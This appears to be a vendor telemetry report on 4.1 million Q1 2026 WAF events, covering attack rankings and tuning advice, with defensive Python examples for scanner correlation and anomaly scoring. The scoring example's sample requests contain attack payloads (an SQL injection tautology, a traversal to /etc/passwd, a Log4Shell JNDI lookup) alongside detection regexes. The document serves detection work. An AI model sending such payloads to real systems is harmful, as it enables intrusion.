Telemetry Findings: 4.1M WAF Events Reveal the Top 10 Web Attack Patterns in Q1 2026
Telemetry report — analysis of 4.1 million WAF events across Threatstealth-monitored environments in Q1 2026. Top attack categories, source geographies, scanner fingerprinting volume, and the three technique shifts that matter for defenders.
Threatstealth WAF processed 4.1 million matched events across monitored environments in Q1 2026 (January 1 – March 31). This report analyses attack category distribution, source patterns, and technique shifts relevant to WAF rule tuning and SOC prioritisation.
Attack Category Distribution (4.1M Events)
| Rank | Category | Event volume | % of total | Q4 2025 rank |
|---|---|---|---|---|
| 1 | SQL Injection (SQLi) | 892,000 | 21.8% | #1 |
| 2 | Scanner / Reconnaissance | 781,000 | 19.1% | #3 |
| 3 | Cross-Site Scripting (XSS) | 614,000 | 15.0% | #2 |
| 4 | Path Traversal / LFI | 489,000 | 11.9% | #4 |
| 5 | Remote File Inclusion (RFI) | 312,000 | 7.6% | #6 |
| 6 | Known CVE Exploitation (non-Log4j) | 287,000 | 7.0% | #7 |
| 7 | Log4Shell (CVE-2021-44228) remnants | 201,000 | 4.9% | #5 |
| 8 | Command Injection / RCE | 198,000 | 4.8% | #8 |
| 9 | HTTP Protocol Anomalies | 187,000 | 4.6% | #9 |
| 10 | Authentication Bypass | 139,000 | 3.4% | #10 |
Key Finding 1 — Scanner-First Attacks Rose to #2
Automated reconnaissance events moved from #3 to #2 by volume, driven by mass scanning for 47 specific CVEs across exposed web infrastructure. The most-scanned CVEs were: Spring4Shell (CVE-2022-22965), Apache Struts CVE-2023-50164, PHP CGI CVE-2024-4577, and Erlang/OTP CVE-2025-32433. Scanner fingerprinting of these CVEs preceded exploitation attempts by a median of 4.2 days — making WAF-level scanner detection a useful early-warning signal.
- Scanner tools identified: Nuclei (42% of scanner events), Metasploit (18%), custom HTTP clients (31%), Shodan Favicons scanner (9%)
- Most-scanned CVE categories: network services (38%), PHP frameworks (24%), Java frameworks (21%), CMS plugins (17%)
- Scanner → exploit conversion rate: 3.1% of scanner events were followed by an exploitation attempt on the same target
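The scanner-as-leading-indicator metrics above (conversion rate and scan-to-exploit lead time) can be computed from raw WAF events. The following is an added example, not Threatstealth's own tooling; the event fields, the 14-day correlation window and the sample events are constructed, and it assumes "same target" means the same source IP hitting the same host, which the report does not spell out.

```python
"""Scanner-to-exploit correlation over WAF events (added example).

Computes two leading-indicator metrics from a stream of matched WAF events:
  * conversion rate: share of scanner events followed, within a window, by an
    exploitation-category event from the same source against the same host;
  * median lead time (days) from a pair's first scanner hit to its first
    exploitation attempt.
Event schema, window length and sample data are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Constructed sample events: (ISO timestamp, source_ip, target_host, category).
# Category names loosely follow the report's top-10 table.
SAMPLE_EVENTS = [
    ("2026-01-03T08:00:00", "203.0.113.10", "shop.example", "scanner"),
    ("2026-01-07T08:00:00", "203.0.113.10", "shop.example", "known_cve"),   # 4.0 days later
    ("2026-01-05T09:10:00", "198.51.100.7", "api.example", "scanner"),
    ("2026-01-05T09:11:00", "198.51.100.7", "api.example", "scanner"),      # no follow-up
    ("2026-01-10T12:00:00", "198.51.100.200", "blog.example", "scanner"),
    ("2026-02-20T12:00:00", "198.51.100.200", "blog.example", "rce"),       # outside window
    ("2026-02-01T00:00:00", "192.0.2.44", "shop.example", "sqli"),          # no prior scan
    ("2026-02-10T10:00:00", "203.0.113.99", "blog.example", "scanner"),
    ("2026-02-12T10:00:00", "203.0.113.99", "blog.example", "rce"),         # 2.0 days later
    ("2026-03-20T10:00:00", "192.0.2.77", "api.example", "scanner"),        # no follow-up
]

# Categories treated as exploitation attempts (scanner and protocol anomalies are not).
EXPLOIT_CATEGORIES = {"sqli", "xss", "path_traversal", "rfi", "known_cve",
                      "log4shell", "rce", "auth_bypass"}
CORRELATION_WINDOW = timedelta(days=14)  # assumption: the report states no window


def parse(events):
    """Convert ISO timestamps to datetime and sort chronologically."""
    return sorted((datetime.fromisoformat(ts), ip, host, cat) for ts, ip, host, cat in events)


def correlate(events, window=CORRELATION_WINDOW):
    """Return (conversion_rate, median_lead_days, converted_pairs)."""
    by_pair = defaultdict(list)  # (source_ip, target_host) -> [(ts, category), ...]
    for ts, ip, host, cat in parse(events):
        by_pair[(ip, host)].append((ts, cat))

    scanner_total = scanner_converted = 0
    lead_times, converted = [], []
    for pair, evs in by_pair.items():
        scan_times = [ts for ts, cat in evs if cat == "scanner"]
        exploit_times = [ts for ts, cat in evs if cat in EXPLOIT_CATEGORIES]
        scanner_total += len(scan_times)
        # Each scanner event counts as converted if an exploit follows it within the window.
        for st in scan_times:
            if any(st < et <= st + window for et in exploit_times):
                scanner_converted += 1
        # Lead time is measured once per pair, from the first scan to the first exploit.
        if scan_times:
            first_scan = scan_times[0]
            later = [et for et in exploit_times if first_scan < et <= first_scan + window]
            if later:
                lead_times.append((later[0] - first_scan).total_seconds() / 86400)
                converted.append(pair)

    rate = scanner_converted / scanner_total if scanner_total else 0.0
    lead = median(lead_times) if lead_times else None
    return rate, lead, converted


if __name__ == "__main__":
    rate, lead, pairs = correlate(SAMPLE_EVENTS)
    print(f"conversion rate: {rate:.1%}, median lead: {lead} days, pairs: {pairs}")
```

On the constructed sample, two of six scanner events convert (33.3%) and the median lead time is 3.0 days; the 198.51.100.200 pair is deliberately excluded because its exploitation attempt falls outside the window, which is the kind of cut-off a SOC has to choose when operationalising the 4.2-day median the report observed.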
Key Finding 2 — Log4Shell Still Generates 4.9% of Events (2.5 Years Post-Disclosure)
Log4Shell (CVE-2021-44228) events accounted for 201,000 WAF events in Q1 2026 — 4.9% of total volume. This reflects two things: persistent unpatched deployments across the internet, and the fact that automated scanning tools still include Log4Shell probes in default scan profiles. The persistence of this pattern argues for keeping Log4Shell detection rules active indefinitely.
Key Finding 3 — Geographic Distribution Shift
Source IP geographies shifted in Q1 2026. Traffic from Tor exit nodes increased 34% year-over-year. VPN/proxy IP traffic increased 22%. Traffic from residential IP ranges (previously used only in targeted attacks) increased 41% — a likely indicator of botnet-infected residential devices being used to launder attack traffic.
- Tor exit nodes: 8.2% of all WAF events (up from 6.1% in Q1 2025)
- Known hosting/VPS ranges: 34.1% (consistent year-over-year)
- Residential IP ranges: 18.7% (up from 13.2% in Q1 2025)
- Enterprise/corporate ranges: 6.4% (insider threat or compromised corporate systems)
WAF Tuning Recommendations
- Enable Log4Shell detection permanently — do not disable based on vulnerability age
- Add Nuclei user-agent and header fingerprints to scanner detection rules
- Use scanner events as leading indicators — correlate scanner hits with subsequent exploitation attempts on the same IP
- Tor exit node blocking: consider deny-by-default for Tor IPs in high-security applications
- Deploy anomaly scoring mode — individual rule matches are low-signal; accumulating anomaly scores per session increases detection fidelity
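The anomaly-scoring recommendation, together with the Nuclei-fingerprint and permanent-Log4Shell-rule recommendations above and the persistence argument in Key Finding 2, is illustrated by the following added example. It is not Threatstealth's or OWASP CRS's code: the rule set, weights, threshold, session key (client IP) and sample requests are all constructed, and the patterns are deliberately minimal detection signatures rather than a production ruleset.

```python
"""Per-session anomaly scoring over WAF request records (added example).

Each matching rule adds a weight to the client's running score; a session is
flagged only once its cumulative score reaches the threshold, so individual
low-signal matches still add up. Rules, weights, threshold and sample requests
are constructed for this example.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed rules: (rule_id, description, compiled pattern, field to inspect, weight).
RULES = [
    ("SCANNER-NUCLEI", "Nuclei user-agent fingerprint",
     re.compile(r"\bNuclei\b", re.I), "user_agent", 3),
    ("LOG4SHELL-JNDI", "JNDI lookup marker (CVE-2021-44228); kept active indefinitely",
     re.compile(r"\$\{\s*jndi\s*:", re.I), "any", 5),
    ("PATH-TRAVERSAL", "dot-dot path segment",
     re.compile(r"(^|[\\/])\.\.([\\/]|$)"), "path", 4),
    ("SQLI-TAUTOLOGY", "quote followed by an OR tautology",
     re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I), "query", 4),
]
THRESHOLD = 5  # constructed; flag a session once its cumulative score reaches this

# Constructed sample requests, keyed by client IP as the session identifier.
SAMPLE_REQUESTS = [
    {"session": "203.0.113.10", "path": "/login.php", "query": "user=admin'%20or%201%3D1",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"session": "203.0.113.10", "path": "/static/../../etc/passwd", "query": "",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"session": "198.51.100.7", "path": "/", "query": "",
     "headers": {"User-Agent": "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"}},
    {"session": "198.51.100.7", "path": "/api/health", "query": "",
     "headers": {"User-Agent": "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)",
                 "X-Api-Version": "${jndi:ldap://probe.invalid/x}"}},
    {"session": "192.0.2.44", "path": "/products", "query": "id=42",
     "headers": {"User-Agent": "Mozilla/5.0"}},
]


def normalise(value):
    """Percent-decode twice so single- and double-encoded input matches the same rule."""
    return unquote(unquote(value))


def evaluate_request(req):
    """Return the list of (rule_id, weight) matched by one request."""
    headers = req.get("headers", {})
    fields = {
        "path": normalise(req.get("path", "")),
        "query": normalise(req.get("query", "")),
        "user_agent": headers.get("User-Agent", ""),
    }
    # "any" inspects every decoded field plus all header values (Log4Shell probes land anywhere).
    header_blob = " ".join(f"{k}: {normalise(v)}" for k, v in headers.items())
    fields["any"] = " ".join(list(fields.values()) + [header_blob])
    return [(rule_id, weight) for rule_id, _desc, pattern, field, weight in RULES
            if pattern.search(fields[field])]


def score_sessions(requests, threshold=THRESHOLD):
    """Accumulate scores per session.

    Returns (scores, flagged, timeline); timeline holds one
    (session, rule_ids, running_score, over_threshold) entry per request so an
    analyst can see which request pushed a session over the line.
    """
    scores = defaultdict(int)
    timeline = []
    for req in requests:
        sid = req["session"]
        hits = evaluate_request(req)
        scores[sid] += sum(weight for _, weight in hits)
        timeline.append((sid, [rule_id for rule_id, _ in hits], scores[sid], scores[sid] >= threshold))
    flagged = {sid for sid, total in scores.items() if total >= threshold}
    return dict(scores), flagged, timeline


if __name__ == "__main__":
    for entry in score_sessions(SAMPLE_REQUESTS)[2]:
        print(entry)
```

Neither of 203.0.113.10's requests crosses the threshold on its own (4 points each), but the session is flagged on the second request at a cumulative 8; the Nuclei session scores 3 on its first probe and is flagged on the next one when the JNDI marker adds 5. The Log4Shell rule carries the highest weight precisely because, as Key Finding 2 argues, a JNDI lookup marker in a 2026 request is still a near-certain exploitation attempt.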